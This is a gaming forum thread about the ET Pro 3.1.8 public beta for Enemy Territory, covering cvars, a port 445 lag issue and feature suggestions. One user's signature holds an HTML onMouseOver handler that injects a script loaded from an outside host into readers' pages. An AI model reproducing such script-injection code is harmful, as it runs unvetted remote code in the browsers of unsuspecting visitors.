ET Pro 3.1.8 Public Beta Release

Official ET Pro announcements here...

Moderators: Forum moderators, developers

Rain

Post by Rain »

tdg_sparky wrote:I like the new features and I noticed the new cvars that come with the write-up. I also have a collection of cvars from the 3.1.0 but I notcied by pulling down the console and typing b_ then hitting tab that there are quite a few more hidden cvars. Is there an exhaustive list for all of the bani 'b_' cvars as well as the 'g_' and 'sv_' cvars.
The example.cfg files should cover all of the currently existing b_* cvars (save 1 debug cvar which isn't very useful, and 1 or 2 read-only cvars.) Documenting all of the g_ and sv_ cvars is a project in and of itself. :P
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
jarppa

Post by jarppa »

HarryHirsch wrote:there are some firewall issues on tcp:445 and this cause some players to lags at mapchange or completelly crash et at connect.

and ONLY on 3.1.8

bani ?

Harry
Jep, I've noticed same problem. Changed back to 3.1.0 and no lag at begining of the map.
h4ks

Post by h4ks »

Rain wrote:
tdg_sparky wrote:I like the new features and I noticed the new cvars that come with the write-up. I also have a collection of cvars from the 3.1.0 but I notcied by pulling down the console and typing b_ then hitting tab that there are quite a few more hidden cvars. Is there an exhaustive list for all of the bani 'b_' cvars as well as the 'g_' and 'sv_' cvars.
The example.cfg files should cover all of the currently existing b_* cvars (save 1 debug cvar which isn't very useful, and 1 or 2 read-only cvars.) Documenting all of the g_ and sv_ cvars is a project in and of itself. :P
well i must have a cheap version of etpro 3.1.8 since i'm missing b_noleanactivate, b_simpleitems and b_locationmode (just found this last one yesterday) and possibly more in my example.cfg :p
anyway, really good job for a beta ;)
FraUz

Server side cvars

Post by FraUz »

Which are exactly the server side cvars added after 3.1.0?
I suppose b_realhead and b_flushitems are 2 of them. Any other?

Talkin about clint side cvars, what's the use for b_beginround and b_endround?
deej

Post by deej »

Read the example.cfg that comes with ETPro 3.1.8 for your first question.

For your 2nd question: these are cvars that ETPro executes automatically at the beginning and end of each round.
Our servers now run on 64 bit steroids. Point your ET to:
- Forgotten Ground StopWatch Server with occasional wolfrof 1
- Fraggle Rock ETPub Server - Mix up ET/UT & Duke Nukem
thompier

Post by thompier »

Suggestions for the next release:

- Quantity of ammo by pointing a teammate with the crosshair (RtCW feature) ;
- Different colors for simple items (red for medpacks, yellow for ammopacks, keep black for weapons?) ;
- A fireteam which preserves the same size with b_locationMode 1.

Good job Bani.
fretn

Post by fretn »

thompier wrote:Suggestions for the next release:
- Different colors for simple items (red for medpacks, yellow for ammopacks, keep black for weapons?) ;
what about pink ?
thompier wrote: - A fireteam which preserves the same size with b_locationMode 1.
Good job Bani.
what needs to be cut down then ? the size of the playernames, the size of the locationname ?
Day by day : http://w.twwwo.be/
Deus

Post by Deus »

fretn wrote:
thompier wrote:Suggestions for the next release:
what about pink ?
thompier wrote: - A fireteam which preserves the same size with b_locationMode 1.
Good job Bani.
what needs to be cut down then ? the size of the playernames, the size of the locationname ?
Maybe just not the changing size all the time. cause it sets my focus on it when changed automatically. Maybe if the loc file is read and the size is fittet to the longest name available (Recalculated it player join/leave fireteam) ?
=FF=im2good4u

Post by =FF=im2good4u »

no add a cvar for client to set them ax length to display of location names

si incase they dont understnd it since its beeing cut off they cna use thier binds to set the cvar to off so they see the full name :P

and personaly i thinm simple items are simpel enough :)
cysco24

Post by cysco24 »

I like the ammo idea. As a medic i always check teamates health. Field ops could then do the same (with ammo).

Pink health packs? How about changing the packs to look like a tylenol capsule, half white half red. :lol:
>>steven!

Post by >>steven! »

the ammo idea is a good one, its also an old one thats been brought up many a time, to the reaction "thats a good idea"

we live in hope :)
UK Elite Guard
#ukeg on Quakenet
www.ukeliteguard.co.uk
Est. Jan 2002
Mark

Post by Mark »

Hi,

and PLEASE include the "say: " lines in the etconsole.log in future versions again or make it a option.... This one is really missed.

Greets
Mark
Get owned at: Gaming@d1p.de (217.172.182.126:27960)
Hi! I'm a .signature *virus*! Copy me into your ~/.signature to help me spread!
=FF=im2good4u

Post by =FF=im2good4u »

i though the ammo thing was not added since it would covert ops even weaker
>>steven!

Post by >>steven! »

how would it make coverts even weaker, just put there ammo display to summet like 30/00 as default, u never know it might make them stronger as the enemy will bne too busy packing them up \0/
UK Elite Guard
#ukeg on Quakenet
www.ukeliteguard.co.uk
Est. Jan 2002
Grim|EFG

Post by Grim|EFG »

thompier wrote: - Quantity of ammo by pointing a teammate with the crosshair (RtCW .
Yes, this has always been in (dare I say it on these forums) Shrub RTCW and was added in the most recent release of OSP. I kind of miss it in ET, but it is less usefull because in ET people can't guzzle up ammo packs if they have full Ammo.